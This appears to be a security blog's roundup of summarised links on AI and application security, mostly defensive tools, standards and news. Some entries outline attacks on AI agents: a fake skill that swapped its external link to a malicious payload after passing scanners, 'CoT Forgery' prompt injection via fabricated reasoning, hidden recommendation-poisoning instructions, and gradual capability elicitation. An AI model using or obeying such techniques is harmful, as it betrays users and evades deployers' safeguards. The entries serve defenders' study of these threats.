Appsec adventures

Posts

Showing posts from June, 2026

LF AI & Data Security and Compliance Work Group

June 30, 2026

This GitHub repository serves as the central hub for the LF AI & Data Foundation's Security and Compliance Work Group, which is dedicated to developing a comprehensive security and compliance strategy for AI-enabled applications. The group operates through two specialized subgroups focused on Use Cases and Threat Modeling and Risk and Compliance, and collaborates with major standards organizations like OWASP, OpenSSF, and NIST. The repository contains meeting information, project assets, whitepapers, and references to related security standards, all aimed at fostering secure AI development and reducing risk in regulated environments. https://github.com/lfai/security-and-compliance

AVE – Agentic Vulnerability Enumeration

June 30, 2026

AVE is a behavioral classification standard for agentic AI components (skill files, MCP servers, system prompts, and plugins), providing stable identifiers and scoring for vulnerabilities that traditional CVE/OSV standards cannot describe. It assigns AVE IDs to 51 distinct attack classes (e.g., metamorphic payloads, tool poisoning, MCP tool hook hijacking), scores them using OWASP AIVSS v0.8 with a 10-factor Agentic Amplification and Reachability Score (AARS), and maps every record to frameworks like OWASP MCP Top 10 and MITRE ATLAS. The reference implementation (Bawbel Scanner) detects these vulnerabilities in CI pipelines, and the open schema (Apache 2.0) allows any security tool to integrate AVE IDs into their findings. https://github.com/bawbel/ave

AITBM – AI Trust Benchmarking and Maturity Framework

June 30, 2026

AITBM is a bias-resistant framework for quantifying AI security risk without subjective guesswork. It uses a three-layer architecture: Intrinsic Vulnerability Profile (21 sub-metrics across 5 security axes), Operational Risk Posture (deployment context), and Assurance Confidence Index (evidence freshness). It produces a mathematically grounded composite score (ERS) that preserves multi-dimensional signal. Key features: deterministic rubrics (0–4 scoring), agentic-native threat modeling, tiered assessment pathways, and alignment with 16 external frameworks (OWASP, MITRE ATLAS, NIST AI RMF, ISO/IEC 42001, EU AI Act). Includes specification, worked examples, website with calculator, and Docker deployment. https://github.com/ninedter/AITBM

MITRE ATLAS Agent: An Open-Source AI Assistant for Exploring the ATLAS Framework

June 30, 2026

This open-source AI assistant, built with Langflow, provides three ways to explore the MITRE ATLAS Framework: a natural-language chat interface for learning about tactics, techniques, mitigations, and case studies; an MCP server and API for integration into other tools and workflows; and full customizability of prompts and subagents. It uses a hierarchical system where an orchestrator manages three specialist agents for semantic search, structured data lookup, and knowledge graph generation. The agent can be run locally with the uv tool and configured with any compatible LLM provider, and it exposes its flows as MCP tools, making it a practical resource for security research and workflow integration. https://github.com/mitre-atlas/atlas-knowledge-base-agent

Model Context Protocol (MCP) Explained: From Integration Problem to Production Deployment

June 30, 2026

This article explains Anthropic's Model Context Protocol (MCP) in three levels of difficulty. Level one covers why MCP matters: it solves the integration problem of connecting multiple AI clients to multiple tools by replacing M times N custom adapters with just M plus N protocol implementations. Level two details the architecture, explaining how hosts, clients, and servers work together, and the key primitives: tools, resources, and prompts. Level three addresses real-world deployment concerns, including transport options (stdio for local, HTTP for remote), security considerations like authentication and sandboxing, and decisions around local versus remote hosting. The article concludes that MCP provides a scalable, standardized foundation for building AI systems that reliably interact with external data and software. https://machinelearningmastery.com/model-context-protocol-explained-in-3-levels-of-difficulty/

MRAgent: Graph Memory for LLM Agents

June 28, 2026

MRAgent is a retrieval-augmented QA system that builds a graph-structured episodic memory from long, multi-session dialogues instead of using simple vector retrieval. It operates in two phases: first, it rewrites dialogue turns into self-contained sentences (resolving pronouns, converting dates), extracts keywords, and stores everything as a graph with nodes for key entities, episodes, topics, and personal facts; second, it answers questions by running a tool-calling reasoning loop where the LLM uses seven specialized graph query tools (e.g., by topic, time, personal info, event context) to retrieve relevant memory and produce an answer. Evaluated on LoCoMo and LongMemEval benchmarks, the system uses OpenRouter for LLM access, caches intermediate results to avoid redundant work, and includes an LLM-as-judge evaluation script—treating memory as a reconstructed graph rather than retrieved chunks for more structured, context-aware querying in long-form conversational AI. https://gith...

Un-Jailbreakable AI Doesn't Exist—But Open, Neural-Symbolic Gets Closest

June 28, 2026

Perfectly "un-jailbreakable" AI models don't exist—it's an unrealistic goal. But the best way to get close is neural-symbolic AI combined with open-source models, not closed proprietary systems. The real threat isn't simple prompt injection, but "capability-elicitation attacks"—where an AI follows instructions but is gradually coaxed over hundreds of prompts into producing something dangerous. The solution: a "generate, then verify" pipeline. Let the neural model generate outputs, but quarantine risky ones and pass them through a symbolic verification layer (formal analyzers, sandboxes, logic engines) that rigorously judges what the output actually does. This is more reliable than just using another LLM to check things. Why openness helps: An open ecosystem can field a diverse ensemble of specialist verifiers—far better than any single company. Independent verifiers with different blind spots make the system harder to game. While bad actors can...

MLSec Application Security Testing Guide (MLASTG)

June 27, 2026

The MLASTG is an open-source framework for security testing machine learning (ML) and large language model (LLM) systems, designed for enterprise and defense-grade verification. Inspired by OWASP standards and aligned with MITRE ATLAS, NIST AI RMF, and the EU AI Act, it provides three core components: a verification standard (MLASVS) with 168 verifiable controls across seven categories (e.g., data, model, LLM-specific, supply chain), a testing guide with detailed test cases and Python scripts, and a weakness enumeration (MLASWE). It defines two testing levels—L1 (Standard) and L2 (Defense-in-Depth)—for different risk profiles. The project is in active development (v0.1) and includes an executable CLI and a website deployment, welcoming community contributions across test cases, translations, and new coverage areas. https://github.com/bb1nfosec/MLASTG

The Jinn Guard: Kernel-Aware Agent Governance Daemon

June 27, 2026

The Jinn Guard is a research prototype for a kernel-aware governance daemon that enforces safety constraints on autonomous AI agents before they execute any action. It operates over Unix domain sockets, using a multi-stage decision pipeline that includes HMAC-based authentication, agent identity verification, intent allowlisting, behavioral drift detection, and a Z3 SMT solver to check formal policy invariants. The system integrates with eBPF-LSM for kernel-level telemetry and enforcement, and maintains a tamper-evident, hash-chained audit log. The provided benchmarks claim high performance (sub-millisecond decisions) and demonstrate resilience against various attacks (replay, forgery, quota exhaustion). It includes a Python SDK for agent integration, a systemd service, and a Docker-based sandbox for mandatory mediation testing. The project is positioned as a validated prototype with a clear security model, but notes limitations regarding filesystem path resolution and interpreter chai...

Firewall/MDM/EDR for Coding Agents

June 27, 2026

A security product designed to enforce organization-wide guardrails on AI coding agents. It allows security leaders to set policies scoped by team, which are then enforced across all agents, while engineers can tailor policies to their individual workflows with inline monitors. The product is pre-tuned with over 40 real-world failure modes to provide baseline security that can be adapted to an organization's specific environment. The page offers a guided deployment option where the provider assists with setup and configuration. https://watcher.apolloresearch.ai/landing/index.html

Securing the Nation Against Advanced Cryptographic Attacks

June 27, 2026

This executive order establishes a national policy to transition U.S. federal information systems to post-quantum cryptography (PQC) to protect against the threat of future quantum computer attacks. It mandates that all agencies designate a PQC migration lead and sets specific deadlines: high-value assets and high-impact systems must transition to PQC for key establishment by December 31, 2030, and for digital signatures by December 31, 2031. The order directs NIST to initiate a pilot project, requires the Federal Acquisition Regulatory (FAR) Council to propose rules mandating contractor compliance by 2030, and calls for public guidance on a "cryptographic bill of materials." It also tasks relevant agencies with assisting critical infrastructure owners, engaging international partners, and accelerating the validation of cryptographic modules through the NIST program. https://www.whitehouse.gov/presidential-actions/2026/06/securing-the-nation-against-advanced-cryptographic-at...

Protect U Back: A Local Pre-I/O Audit Gate for AI Agents

June 27, 2026

Protect U Back (PUB) is a local pre-I/O audit gate and supervisor for AI coding agents, designed to enforce a simple rule: any agent action must leave observable evidence before it is allowed to affect the real world. It operates by intercepting proposed tool calls and filesystem or shell actions, normalizing them into auditable "envelopes," observing the state of a protected surface before and after the action, and deciding to `PASS`, `HOLD`, `KILL`, or `QUARANTINE` the action. The system uses an "X-ray" layer to take snapshots and compute residuals based on a process equation, ensuring that any unobserved or mutated state triggers a `HOLD`. It is not a prompt filter but an action inspector, designed to prevent silent data exfiltration or system modification. The project provides a launcher to run Claude Code or Codex CLI through this gate, and on Linux/WSL2 can additionally confine the agent inside a `bwrap` cage. The repository includes a reproducible credential-...

Fake AI Agent Skill Passed Security Scans and Reportedly Reached 26,000 Agents

June 27, 2026

Security firm AIR created a fake, harmless AI agent skill named "brand-landingpage" to demonstrate how easily malicious skills could bypass current trust and security mechanisms. The skill successfully passed every scanner it was tested against and was distributed to an estimated 26,000 agents after being merged into a popular marketplace (inheriting its 36,000 stars) and promoted via Instagram ads. The deception worked because scanners only analyze the skill package itself, while the malicious component was hosted on an external, attacker-controlled link that pointed to legitimate documentation during the review but was swapped to a malicious payload after widespread installation. The article highlights this as a structural problem: skills are treated as static text, but their external dependencies can change at any time. It recommends that defenders treat skills as software, not text, vet external links continuously, pin versions, enforce least privilege, and control the so...

Meta AI Agent Account Takeover: The Risk of Missing Authorization in Agentic Workflows

June 27, 2026

This article from the AI Village discusses a critical security vulnerability in agentic AI workflows: the lack of proper authorization controls when agents are connected to privileged account-management tools (like password resets or email changes). The author explains that the core issue is not the LLM itself being tricked, but rather a classic broken access control problem where the agent has a direct path from understanding a user's natural language request to executing a sensitive mutation without verifying account ownership. The article outlines three common design patterns for handling privileged actions and analyzes how each can still be abused (e.g., by triggering verification emails for other accounts). It proposes a "Maze Design" pattern with multiple gates (intent classification, identity verification, policy engine, etc.) to force agents into controlled execution paths. The author concludes that organizations are rushing to deploy agents without understanding ...

OWASP Artificial Intelligence Security Verification Standard (AISVS)

June 27, 2026

The OWASP AISVS is a community-driven framework that provides a structured, verifiable checklist of security requirements for AI-enabled systems. Modelled after the OWASP ASVS, it offers 191 testable controls across 12 chapters covering the entire AI lifecycle, from training data integrity to agentic security and adversarial robustness. The standard defines three verification levels (1-3) for different risk profiles and includes a research wiki with implementation guidance for each requirement. It is designed to complement existing governance frameworks like NIST AI RMF and the EU AI Act by providing the technical, implementation-level controls they reference. The project is vendor-neutral and open-source under a Creative Commons license. https://github.com/OWASP/AISVS

Two Months In: Assessing the Impact of NIST's Enrichment Cutbacks

June 27, 2026

This article analyzes the effects of the U.S. National Vulnerability Database's (NVD) policy change, implemented on April 15, 2026, to prioritize enrichment for only a subset of CVEs. The author finds that two months in, roughly 5,100 out of 13,400 new CVEs were not scheduled for enrichment, and only about 20% of all published CVEs received a NIST CVSS vector. While time-to-analysis for prioritized CVEs has improved, the system remains sensitive to weekly volume spikes and still leaves a significant backlog. The article also highlights systemic inaccuracies in NIST's scoring compared to independent analysis, often differing in metrics like Attack Complexity and Privileges Required. The author argues that organizations can no longer rely on NIST alone for complete, timely, and accurate vulnerability data, and announces the availability of their own NVD-compatible API as an alternative enrichment source. https://blog.volerion.com/posts/two-months-in-nist-cuts-back-on-enrichment-...

(October 2025) Understanding Spec-Driven-Development: Kiro, spec-kit, and Tessl

June 27, 2026

This article from Martin Fowler's site explores the emerging concept of Spec-Driven Development (SDD) by examining three tools that claim to implement it: Kiro, GitHub's spec-kit, and the Tessl Framework. The author defines SDD as a "documentation-first" approach where a structured specification is written before code and serves as a source of truth. The tools vary significantly in their implementation, from lightweight workflows to more elaborate artifact generation, and in their ambition—ranging from "spec-first" to "spec-anchored" (maintaining the spec over time) to "spec-as-source" (where the spec is the primary artifact). The author raises critical questions about the practical utility of these tools, noting that their rigid workflows may be overkill for small tasks, the generated markdown files can be tedious to review, and the approach risks creating a false sense of control due to LLM non-determinism. The article concludes by draw...

Information-Flow Control: Moving Toward Secure Autonomous Agents

June 27, 2026

This article from Microsoft proposes using information-flow control (IFC) as a deterministic security model to enable secure, autonomous AI agents. The core idea is to label all data ingested by an agent (e.g., with integrity and confidentiality labels), propagate those labels as data flows through the agent loop, and enforce policies before any tool call is executed. This approach can deterministically prevent threats like prompt injection and data exfiltration, reducing the need for fallible human oversight. The authors detail how IFC can be integrated into real systems using the Model Context Protocol (MCP) and extensions for clients like GitHub Copilot CLI and the Microsoft Agent Framework, providing concrete examples of policy enforcement. They are working with the MCP community to refine a proposal for standardizing IFC labels and policies. https://commandline.microsoft.com/information-flow-control-moving-toward-secure-autonomous-agents

The Agent Is Not the Scanner: Making AI Security Agents Better

June 27, 2026

This article presents an empirical study on building effective AI-assisted security workflows, comparing the performance of 11 different language models across three configurations: a control (no tools), skills-only (structured guidance), and MCP-enabled (with external tools). The key finding is that scaffolding benefits are not uniform—weaker models (below 0.60 F1) see significant improvements from skills, while stronger models (above 0.75 F1) actually regress due to overhead. The author also discovered that MCP tools hurt performance on static code snippet benchmarks because there is nothing to run, but are valuable on live targets. Based on these results, the article provides practical recommendations, including routing models based on their strength, separating recon, exploit reasoning, and reporting into different stages with different models, and using deterministic scanners for known vulnerabilities to save costs. https://shad0wmazt3r.github.io/ai-security

Daybreak: Tools for Securing Every Organization in the World

June 27, 2026

OpenAI has announced a major expansion of its Daybreak cybersecurity initiative, shifting focus from AI-powered vulnerability discovery to the acceleration of end-to-end patch automation. The expansion includes the launch of a full version of GPT-5.5-Cyber, which sets new state-of-the-art performance on security benchmarks and is designed for advanced, authorized defensive work; an update to the Codex Security plugin that automates patching workflows directly within developer environments; and the Daybreak Cyber Partner Program to integrate these capabilities into partner security products. Additionally, OpenAI founded "Patch the Planet" with Trail of Bits and HackerOne, an initiative that deploys security researchers to help over 30 open-source projects (including cURL, Go, and Python) move from finding vulnerabilities to landing fixes. The overarching goal is to democratize access to frontier cyber capabilities, enabling defenders worldwide to keep pace with AI-accelerated ...

Package Manager CWEs

June 27, 2026

This article provides a comprehensive analysis of over two hundred CVEs and security advisories filed against package managers (both clients and registries), identifying recurring failure patterns that appear independently across different tools and ecosystems over many years. The author categorizes common vulnerabilities on the client-side, including archive path traversal, argument injection into VCS commands, integrity checks that fail open, credential leakage, dependency confusion, unsafe deserialization of manifests, and resource exhaustion. For registries, the identified patterns include authorization flaws that allow publishing or replacing others' packages, account takeover via recovery paths, stored XSS, server-side code execution, SSRF, and insecure direct object references. The piece concludes that most of these issues stem from the same fundamental mistakes being repeated, and suggests that package manager maintainers can improve security by studying the advisory feeds ...

From SQLi to RCE – Exploiting LangGraph's Checkpointer

June 27, 2026

This Check Point Research article details the discovery of three critical vulnerabilities in LangGraph, a popular open-source framework for building stateful AI agents. The vulnerabilities reside in the framework's persistence layer, known as the "checkpointer." Two of the flaws chain together to enable remote code execution (RCE): a SQL injection vulnerability (CVE-2025-67644) in the SQLite checkpointer, and an unsafe deserialization issue (CVE-2026-28277) in the handling of msgpack data. A third vulnerability (CVE-2026-27022) introduces the same SQL injection class in the Redis checkpointer. The attack works by an attacker exploiting the SQL injection to inject a malicious row into database query results, which the application then deserializes unsafely, allowing arbitrary code execution. The vulnerabilities affect self-hosted instances of LangGraph that expose the `get_state_history()` function with user-controlled filters. LangChain has released patches for all three ...

The 10 Hottest Cybersecurity Startups Of 2026 (So Far)

June 27, 2026

7AI - agentic AI for SOC Armadin - agentic attack swarm Dropzone AI - SOC Guardz - unified cybersec platform Noma security - unified AI agent security platform Oasis security - non-human identities Operant AI - AI agent infrastructure Sublime Security - agentic email security Tenex.AI - AI for threat hunting and response Upwind - runtime cloud security platform Title: The 10 Hottest Cybersecurity Startups Of 2026 (So Far) https://www.crn.com/news/security/2026/the-10-hottest-cybersecurity-startups-of-2026-so-far

IBM Expands Project Lightwell as AI Changes Software Security

June 27, 2026

IBM, Red Hat, and Palo Alto Networks have expanded Project Lightwell, a cybersecurity initiative designed to help organizations respond to software vulnerabilities faster. The expansion is driven by the reality that AI has drastically compressed the time between vulnerability discovery and exploitation, outpacing traditional patching. Project Lightwell now integrates Palo Alto Networks' virtual patching technology to create a "shield-and-fix" workflow, providing network-level protection while organizations develop and deploy permanent fixes. This announcement follows IBM's recent launch of a new application security service that uses OpenAI models to not only identify vulnerabilities but also analyze how they can be chained together and prove their exploitability, all within a secure, controlled environment. https://www.ibm.com/think/news/ibm-expands-project-lightwell-ai-software-security

The Grounding Wars Are Coming: How AI Visibility Creates Its Own Black-Hat Playbook

June 27, 2026

This article argues that as AI assistants become key tools for research and purchasing decisions, a new "black-hat" economy is emerging to manipulate their recommendations, analogous to early SEO spam. It highlights "AI recommendation poisoning," where hidden instructions embedded in links or buttons can influence an assistant's memory and future recommendations without the user's knowledge. The article distinguishes between legitimate "grounding" (providing verifiable evidence for AI to inspect), gray-area "shaping" (creating AI-facing content that slants information), and clearly malicious "poisoning" (hidden, non-consensual tampering). It warns that this manipulation undermines user trust in AI-assisted buying, and urges marketers to focus on defensible, evidence-based strategies rather than exploiting loopholes, as platforms and regulators will inevitably tighten the rules. https://www.searchenginejournal.com/the-grounding-...

NVD in the AI Era: The Case for Multi-Source Vulnerability Intelligence

June 27, 2026

This article argues that the traditional reliance on a single, centralized source like the U.S. National Vulnerability Database (NVD) for vulnerability intelligence is no longer sustainable. It highlights the NVD's recent shift to a risk-based triage model, where it will no longer fully enrich every CVE due to an overwhelming volume of submissions—a volume driven by both the expansion of the federated CVE system and the rapid acceleration of AI-assisted vulnerability research. This change creates significant potential blind spots for organizations that depend solely on NVD data. As a result, the article advocates for a multi-source intelligence approach that combines data from various advisories, in-house research, threat intelligence, community contributions, and AI-assisted but human-validated workflows to provide the necessary context, prioritization, and actionability for modern security teams. https://snyk.io/pt-BR/blog/nvd-multi-source-vulnerability-intelligence/

ThreatModeler Introduces Nexus to Automate Threat Modeling with AI Governance

June 27, 2026

ThreatModeler has launched ThreatModeler Nexus, an agentic threat modeling platform designed to automate and govern security analysis for modern software development, particularly as AI-generated code increases. The platform uses a multi-agent system (including mapping, graph, and reporting agents) operating on a centralized "Secure Design Graph" to provide a governed, architecture-aware system of record, rather than just generating one-off answers. It aims to integrate security seamlessly into development workflows, from the IDE to enterprise risk reporting. The launch follows the merger of ThreatModeler and IriusRisk, combining their threat and compliance intelligence. The company is also working with Knox Systems to pursue FedRAMP authorization for federal use, with early enterprise users reporting a 50% reduction in threat modeling effort. https://www.helpnetsecurity.com/2026/06/26/threatmodeler-introduces-nexus-to-automate-threat-modeling-with-ai-governance/

Post-Quantum Security Spurs National Sovereignty Thinking

June 27, 2026

This article examines how recent U.S. AI export controls have exposed critical dependencies in post-quantum cryptography (PQC) migration, forcing governments and CISOs to confront the issue of "quantum sovereignty." The core concern is that many nations' PQC strategies rely on a concentrated set of vendors and standards (like those from NIST) that are subject to foreign jurisdiction, creating a risk of sudden disruption. The article outlines how different regions are responding: the U.S. and EU are setting binding deadlines and regulations, Canada and India are pursuing domestic capability development, Singapore is mandating vendor dependency management for financial institutions, and China is developing its own independent PQC standards. Ultimately, the piece argues that true cryptographic agility requires not just quantum-resistant encryption, but also the ability to control and switch the vendors and supply chains that implement it. https://www.govinfosecurity.com/pos...

Prompt Injection as Role Confusion

June 27, 2026

This research paper identifies the root cause of prompt injection attacks on large language models as "role confusion"—a fundamental flaw in how models internally perceive the source of text. The authors demonstrate that models determine "who is speaking" based on spoofable cues like style or explicit declarations, rather than on the actual role tags (e.g., `<user>`, `<tool>`) that are intended to enforce security boundaries. They introduce "role probes" to measure this internal role perception, showing that injected text occupies the same representational space as the role it imitates. The paper presents "CoT Forgery," a zero-shot attack that injects fabricated reasoning into user prompts or tool outputs, achieving a 60% attack success rate across frontier models. Crucially, the degree of measured role confusion accurately predicts attack success before any text is generated, revealing that current defenses rely on memorization of kn...

Prosus Cyber Xchange

June 27, 2026

Prosus Cyber Xchange is a GitHub organization that serves as a hub for tools and resources developed by the security teams across the Prosus group. It hosts a mix of open-source projects and internal tools. The organization's public repositories currently focus on data privacy and security, featuring a REST API service and embeddable Go library for PII (Personally Identifiable Information) detection and anonymization, along with a "Cyber Champion" initiative to promote secure development practices. https://github.com/Prosus-Cyber-Xchange

Langfuse: Open Source LLM Engineering Platform

June 27, 2026

Langfuse is an open-source platform for building, monitoring, and improving AI applications that use large language models. It provides a complete set of tools including observability to track LLM calls and application logic, centralised prompt management with version control, flexible evaluation methods (including LLM-as-a-judge and user feedback), dataset management for testing and benchmarks, and an interactive playground for quick iteration. The platform integrates seamlessly with popular frameworks like LangChain, LlamaIndex, OpenAI SDK, LiteLLM, and many others. It can be used as a managed cloud service with a free tier or self-hosted on your own infrastructure via Docker, Kubernetes, or virtual machines. Langfuse is MIT-licensed, battle-tested, and widely adopted by the open-source community. https://github.com/langfuse/langfuse

CUGA: Configurable Generalist Agent Harness for the Enterprise

June 26, 2026

CUGA is an open-source, state-of-the-art generalist agent harness designed for building and deploying enterprise-grade AI agents. It provides a modular and configurable framework to handle complex tasks across web and APIs, integrating tools via OpenAPI, MCP, and LangChain. Key features include flexible reasoning modes (fast/balanced/accurate), a comprehensive policy system with human-in-the-loop controls, built-in knowledge (RAG) and memory, multi-agent orchestration via a supervisor, and agent skills for reusable workflows. CUGA supports self-hosting on Kubernetes and offers both a UI for management and a Python SDK for programmatic use. It is benchmarked as #1 on AppWorld and WebArena, making it a high-performance, enterprise-ready foundation for building custom domain-specific agents. https://github.com/cuga-project/cuga-agent